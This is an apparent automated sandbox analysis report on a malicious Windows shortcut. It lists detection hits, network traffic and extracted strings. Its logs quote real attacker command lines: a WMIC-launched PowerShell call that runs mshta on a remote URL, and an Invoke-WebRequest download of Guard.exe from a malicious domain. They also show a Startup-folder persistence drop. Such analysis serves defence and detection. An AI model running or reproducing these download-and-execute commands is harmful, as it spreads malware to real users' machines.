Author: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, NewProcessName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, OriginalFileName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 8176, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", ProcessId: 7584, ProcessName: SwiftWrite.pif

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7952, TargetFilename: C:\Users\user\AppData\Roaming\qJXhXwR.exe

Sigma detected: PowerShell Web Download

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/kSMAbiand" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/kSMAbiand" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\qJXhXwR.exe" , ParentImage: C:\Users\user\AppData\Roaming\qJXhXwR.exe, ParentProcessId: 7720, ParentProcessName: qJXhXwR.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/kSMAbiand" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 7556, ProcessName: powershell.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/kSMAbiand" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/kSMAbiand" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\qJXhXwR.exe" , ParentImage: C:\Users\user\AppData\Roaming\qJXhXwR.exe, ParentProcessId: 7720, ParentProcessName: qJXhXwR.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/kSMAbiand" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 7556, ProcessName: powershell.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 8176, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/Ghep2712'), CommandLine: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/Ghep2712'), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/Ghep2712')", ParentImage: C:\Windows\System32\wbem\WMIC.exe, ParentProcessId: 7404, ParentProcessName: WMIC.exe, ProcessCommandLine: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/Ghep2712'), ProcessId: 7488, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7884, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 2320, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url

Suricata Signatures

ET MALWARE VBScript Redirect Style Exe File Download

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T09:35:21.639605+0100	2026434	1	A Network Trojan was detected	147.45.49.155	443	192.168.2.9	49707	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T09:35:29.367884+0100	2803305	3	Unknown Traffic	192.168.2.9	49713	147.45.49.155	443	TCP

Joe Security ANOMALY Windows PowerShell HTTP PE File Download

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T09:35:38.145177+0100	1810003	2	Potentially Bad Traffic	147.45.49.155	443	192.168.2.9	49722	TCP

Joe Security ANOMALY Windows PowerShell HTTP activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T09:35:37.900856+0100	1810000	1	Potentially Bad Traffic	192.168.2.9	49722	147.45.49.155	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://tiffany-careers.com/Ghep2712...	Avira URL Cloud: Label: malware
Source: https://tiffany-careers.com/Ghep2712	Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe

ReversingLabs: Detection: 34%

Multi AV Scanner detection for submitted file

Source: tzA45NGAW4.lnk	Virustotal: Detection: 25%			Perma Link
Source: tzA45NGAW4.lnk	ReversingLabs: Detection: 18%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.5% probability

Source: unknown	HTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.9:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.9:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.9:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.9:49728 version: TLS 1.2

Source:	Binary string: sethc.pdbGCTL source: mshta.exe, 00000006.00000003.1723263955.000001D24B8F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1727107670.000001D2479F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1722175831.000001D24BAAB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1732474910.000001D2479F4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1722175831.000001D24BA37000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1723381467.000001D2479F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1722645783.000001D24BAAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1723149813.000001D24B9F4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1722333655.000001D247A7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1722027418.000001D24B954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1722518410.000001D24BA55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1723406104.000001D2479F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1722518410.000001D24BAAB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1735347435.000001D2479F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1724949762.000001D24B8D1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1732474910.000001D2479F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1722740168.000001D24BA75000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: .pdbGCTL source: mshta.exe, 00000006.00000002.1735347435.000001D2479B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: sethc.pdb source: mshta.exe, 00000006.00000003.1723263955.000001D24B8F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1732474910.000001D2479F4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1723381467.000001D2479F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1723149813.000001D24B9F4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1722027418.000001D24B954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1724949762.000001D24B8D1000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A521C7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	15_2_00007FF7A521C7C0
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A522A874 FindFirstFileW,Sleep,FindNextFileW,FindClose,	15_2_00007FF7A522A874
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A5226428 FindFirstFileW,FindNextFileW,FindClose,	15_2_00007FF7A5226428
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A522A4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,	15_2_00007FF7A522A4F8
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A522A350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,	15_2_00007FF7A522A350
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A51E2F50 FindFirstFileExW,	15_2_00007FF7A51E2F50
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A521B7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	15_2_00007FF7A521B7C0
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A52272A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,	15_2_00007FF7A52272A8
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A52271F4 FindFirstFileW,FindClose,	15_2_00007FF7A52271F4
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A521BC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	15_2_00007FF7A521BC70
Source: C:\Users\Public\Guard.exe	Code function: 23_2_00954005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	23_2_00954005
Source: C:\Users\Public\Guard.exe	Code function: 23_2_0095494A GetFileAttributesW,FindFirstFileW,FindClose,	23_2_0095494A
Source: C:\Users\Public\Guard.exe	Code function: 23_2_0095C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	23_2_0095C2FF
Source: C:\Users\Public\Guard.exe	Code function: 23_2_0095CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	23_2_0095CD9F
Source: C:\Users\Public\Guard.exe	Code function: 23_2_0095CD14 FindFirstFileW,FindClose,	23_2_0095CD14
Source: C:\Users\Public\Guard.exe	Code function: 23_2_0095F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	23_2_0095F5D8
Source: C:\Users\Public\Guard.exe	Code function: 23_2_0095F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	23_2_0095F735
Source: C:\Users\Public\Guard.exe	Code function: 23_2_0095FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	23_2_0095FA36
Source: C:\Users\Public\Guard.exe	Code function: 23_2_00953CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	23_2_00953CE2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_00194005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	27_2_00194005
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_0019494A GetFileAttributesW,FindFirstFileW,FindClose,	27_2_0019494A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_0019C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	27_2_0019C2FF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_0019CD14 FindFirstFileW,FindClose,	27_2_0019CD14
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_0019CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	27_2_0019CD9F
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_0019F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	27_2_0019F5D8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_0019F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	27_2_0019F735
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_0019FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	27_2_0019FA36
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_00193CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	27_2_00193CE2

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810000 - Severity 1 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.9:49722 -> 147.45.49.155:443
Source: Network traffic	Suricata IDS: 2026434 - Severity 1 - ET MALWARE VBScript Redirect Style Exe File Download : 147.45.49.155:443 -> 192.168.2.9:49707

Source: global traffic	HTTP traffic detected: GET /Project_Information.pdf HTTP/1.1Host: tiffany-careers.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /qJXhXwR.exe HTTP/1.1Host: tiffany-careers.com
Source: global traffic	HTTP traffic detected: GET /tlUmNmGG.txt HTTP/1.1Host: tiffany-careers.comConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 147.45.49.155 147.45.49.155

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49713 -> 147.45.49.155:443
Source: Network traffic	Suricata IDS: 1810003 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP PE File Download : 147.45.49.155:443 -> 192.168.2.9:49722

Source: global traffic	HTTP traffic detected: GET /Ghep2712 HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: tiffany-careers.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /kSMAbiand HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: tiffany-careers.comConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe

Code function: 15_2_00007FF7A522E87C InternetReadFile,

15_2_00007FF7A522E87C

Source: global traffic	HTTP traffic detected: GET /Ghep2712 HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: tiffany-careers.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Project_Information.pdf HTTP/1.1Host: tiffany-careers.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /qJXhXwR.exe HTTP/1.1Host: tiffany-careers.com
Source: global traffic	HTTP traffic detected: GET /kSMAbiand HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: tiffany-careers.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /tlUmNmGG.txt HTTP/1.1Host: tiffany-careers.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: tiffany-careers.com
Source: global traffic	DNS traffic detected: DNS query: x1.i.lencr.org
Source: global traffic	DNS traffic detected: DNS query: nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs

Source: Guard.exe, 00000017.00000003.1715203306.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000002.2633323030.0000000003EFA000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.dr	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Guard.exe, 00000017.00000003.1715203306.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000002.2633323030.0000000003EFA000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Guard.exe, 00000017.00000003.1715203306.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000002.2633323030.0000000003EFA000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Guard.exe, 00000017.00000003.1715203306.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000002.2633323030.0000000003EFA000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.dr	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: powershell.exe, 00000009.00000002.1712339725.000001FB70300000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: svchost.exe, 00000008.00000002.2633153467.0000023948800000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: qmgr.db.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.8.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000009.00000002.1654631616.000001FB6813F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1932290958.00000234F4B35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1752565815.00000234E63C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: Guard.exe, 00000017.00000003.1715203306.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000002.2633323030.0000000003EFA000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Guard.exe, 00000017.00000003.1715203306.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000002.2633323030.0000000003EFA000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.dr	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Guard.exe, 00000017.00000003.1715203306.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000002.2633323030.0000000003EFA000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: powershell.exe, 00000015.00000002.1752565815.00000234E633C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.1413336162.000002C8BD5CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1579963511.000001FB580D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1752565815.00000234E4AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Guard.exe, 00000017.00000003.1715203306.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000002.2633323030.0000000003EFA000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Guard.exe, 00000017.00000003.1715203306.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000002.2633323030.0000000003EFA000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: powershell.exe, 00000009.00000002.1579963511.000001FB58BEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1752565815.00000234E60EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tiffany-careers.com
Source: powershell.exe, 00000015.00000002.1752565815.00000234E6132000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000015.00000002.1752565815.00000234E633C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Guard.exe, 00000017.00000003.1715203306.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000002.2628286184.00000000009B9000.00000002.00000001.01000000.00000010.sdmp, SwiftWrite.pif, 0000001B.00000002.2628389026.00000000001F9000.00000002.00000001.01000000.00000011.sdmp, SwiftWrite.pif.23.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: powershell.exe, 00000005.00000002.1413336162.000002C8BD5CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1413336162.000002C8BD5B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1579963511.000001FB580D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1752565815.00000234E4AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000015.00000002.1752565815.00000234E63C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000015.00000002.1752565815.00000234E63C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000015.00000002.1752565815.00000234E63C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: qmgr.db.8.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
Source: svchost.exe, 00000008.00000003.1448523354.0000023948670000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
Source: powershell.exe, 00000015.00000002.1752565815.00000234E633C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000015.00000002.1752565815.00000234E5C2B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: mshta.exe, 00000006.00000002.1734217919.000001CA44DF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1723431987.000001CA44DF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1727135486.000001CA44DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: powershell.exe, 00000009.00000002.1654631616.000001FB6813F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1932290958.00000234F4B35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1752565815.00000234E63C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000015.00000002.1752565815.00000234E6132000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
